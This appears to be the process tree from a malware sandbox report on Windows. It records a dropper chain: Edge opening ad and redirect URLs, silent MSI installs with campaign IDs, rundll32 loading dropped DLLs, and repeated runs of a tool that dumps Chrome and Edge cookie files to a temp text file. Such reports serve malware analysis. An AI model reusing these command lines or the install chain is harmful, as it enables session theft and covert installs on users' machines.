C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,6701122680547435832,11567310375026515269,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6052 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942319⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1492888&var=39⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb4d5646f8,0x7ffb4d564708,0x7ffb4d56471810⤵
-
C:\Users\Admin\AppData\Local\Temp\9f-24f77-838-e03b0-da4ad1a94739d\Luqafaejoly.exe"C:\Users\Admin\AppData\Local\Temp\9f-24f77-838-e03b0-da4ad1a94739d\Luqafaejoly.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exeC:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\irddkzxw.nfr\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40rzup3o.oiw\ufgaa.exe & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\40rzup3o.oiw\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\40rzup3o.oiw\ufgaa.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe & exit9⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exeC:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe"C:\Users\Admin\AppData\Local\Temp\xbem5cxc.caf\anyname.exe" -q11⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"5⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 18206⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" /quiet SILENT=1 AF=715 BF=7155⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Weather Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628849039 /qn CAMPAIGN=""710"" " CAMPAIGN="710"6⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv yKasnM7UgUqICmWI3CBItg.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2396 -ip 23961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1328 -ip 13281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1632 -ip 16321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3192 -ip 31921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1436 -ip 14361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4668 -ip 46681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 4483⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4252 -ip 42521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2564 -ip 25641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2BC4248A980EBAC18414032B73545D27 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D850BF6609CC99DCE029784610A10D7C C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DED82F831DB51B30022D8650FD0D369F C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 21462F29F1B78E02BD0338B797BCCD5F2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 55B7A2085A1C50C8FC036DA6ACDA0A31 C2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default3⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--PH33"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ffb5c4e9ec0,0x7ffb5c4e9ed0,0x7ffb5c4e9ee05⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:25⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=1860 /prefetch:85⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,6891587716278487518,12896180705907545177,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5520_210547009" --mojo-platform-channel-handle=2316 /prefetch:85⤵
- Loads dropped DLL
-
